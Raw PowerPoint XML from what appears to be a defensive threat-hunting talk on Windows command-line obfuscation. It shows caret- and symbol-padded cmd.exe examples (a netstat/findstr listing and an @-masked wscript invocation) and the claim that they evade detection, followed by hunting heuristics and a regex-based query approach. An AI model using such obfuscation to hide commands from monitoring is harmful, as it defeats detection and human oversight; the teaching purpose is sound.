                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ^^^^ ^|; ,;( ^ (,;^,(^(fi^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>””str LIST^^^^EN””ING)^),;^,) ^ )</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DEAA65-B32A-00C6-9646-6BF01551B07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2480673"/>
            <a:ext cx="10515600" cy="3307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This is the exact same command obfuscated using some simple techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This will still run perfectly, and completely defeats any threat hunting applied so far</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935636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CA709-475F-CB37-ACDA-08C965A92A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66BCB4-EFB8-D288-8318-A00A4CAA51EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849187" y="1122363"/>
            <a:ext cx="10493626" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>At this point, things look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E8F687-A13A-6170-F8CC-6AE80E6E9112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="3602038"/>
            <a:ext cx="8168640" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>But what would a human make of this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6606537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55087-507B-226A-EE3F-841C7AFD1B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DB7DD8-7773-C15C-9738-90B26B59E8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730102" y="365125"/>
            <a:ext cx="10731796" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>What would a human think of these examples?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA8C310-7B44-A7A1-01BE-FC84CBF915BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338824" y="1690687"/>
            <a:ext cx="11514352" cy="1707479"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.exe /c set x=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wsc@ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e:js@cript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> … echo %x:@=%|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,;,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>coMSPec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~ -0, +27%,; ,;, ;^^^^/^^^^b^^^^, ;;; ,^^^^/^c, ,,, ;^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^^art^^; , ; ;/^^^^b ; , ^^^^/^^^^min ,;net^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>””at ^^^^ ^^^^-a^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n””o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ^^^^ ^|; ,;( ^ (,;^,(^(fi^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>””str LIST^^^^EN””ING)^),;^,) ^ )</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF85C6D-C071-A578-30BC-44CB4575C8FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3459835"/>
            <a:ext cx="10515600" cy="3307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A human would immediately recognise the second command as malicious, and would quickly become suspicious of the first one too, even without any training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>In the first case, there are characters that appear in highly unusual contexts - @ symbols without an email address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>In the second, the command is not only mostly a few unusual characters, but is also very long compared to most commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32207283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B1E3E-590C-7CA4-003A-438569B579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121971-FAD7-1500-A776-F70FC3A4935F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849187" y="1122363"/>
            <a:ext cx="10493626" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>You can use unusual behaviours, such as these, as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signal.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F7F2B0-116A-F929-A76C-84A19ED1444D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="3602038"/>
            <a:ext cx="8168640" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>…of guaranteed malicious activity, perhaps some more clearly (and easily) than others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31658304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B7ED2F-E057-BB00-0F96-6B31B238169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34A0E3-E6CF-4F02-AEC0-234DAEA2215C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466722" y="586855"/>
            <a:ext cx="3201366" cy="3387497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Principles of countering command line obfuscation:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F39C41-D684-F995-192E-B2A860530A3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810259" y="649480"/>
            <a:ext cx="6555347" cy="5546047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Look for anomalies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>High length of a command, high counts of unusual characters, cmd.exe piping to cmd.exe, use of constructs such as settings symbols within a variable to be blank (%x:@=%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Sure, this works fine for the most part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Alternatively…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Write a 300+ line regex with the help of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0" err="1"/>
              <a:t>VSCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t> and Regex101.com that looks for built-in Windows commands (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0" err="1"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>) that are being filled with obfuscation characters!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Then, do a single giant:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0" err="1"/>
              <a:t>ProcessCommandLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t> matches regex [insert regex]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>This was the ultimate solution for me, in most respects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2100" dirty="0"/>
              <a:t>Command line obfuscation techniques are very rare but developing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429843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9AC796-C28F-33B7-783E-EA7DDCFF6A6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7FF0E7A-16CD-BF3F-4723-318982129941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2026693" y="1030406"/>
            <a:ext cx="8147713" cy="3081242"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4800" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{615C8DB0-2DE5-0D71-61D4-E6194714FB74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561235" y="3681338"/>
            <a:ext cx="9078628" cy="860620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I hope you learnt a lot, and I will hang around to answer any further questions you may have.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good luck in your careers, and don’t be afraid to learn! You can do this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741994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1B4C56-B71A-400A-B856-F10F6075DA3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052577" y="1373323"/>
            <a:ext cx="5323715" cy="1642970"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Stay Connected #BlueCrew</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{746A94D7-E6F6-4195-85F1-7EABD651230B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061103" y="3277197"/>
            <a:ext cx="5315189" cy="3535083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Scan the QR code to follow us on LinkedIn:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Get updates on future events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Connect with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>BlueCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> sponsors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Grow your cybersecurity network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">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5859EC50-2871-4D41-BBB2-3131D70D777A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7075967" y="1371267"/>
            <a:ext cx="4170530" cy="4147359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1384017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7B17CF-9AA8-BB5C-79E6-9A089D447BD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8FA3335-B7CF-BBE9-BC19-E9904A00BC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect t="12211" b="3519"/>
          <a:stretch>
            <a:fill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3C2C36-E33D-FD78-B7E5-7D7AAF40C13B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Why do we need to hunt?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0CDDFA-E3FA-215C-B5AE-4D27E660A73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255686150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11899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00E3F-B732-D4F9-B79C-60CF1D8C80AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Different domains of threat hunting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC94D8C-CD68-C62A-1861-D43E999C51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09317" y="2986520"/>
            <a:ext cx="1876181" cy="1876181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80575EF3-47DE-FBC9-0038-08AECDED5D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67189" y="2908139"/>
            <a:ext cx="1857621" cy="1857621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E480BA6-7AE4-F614-DCD2-DF9590B15E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15781" y="2908138"/>
            <a:ext cx="1857621" cy="1857621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
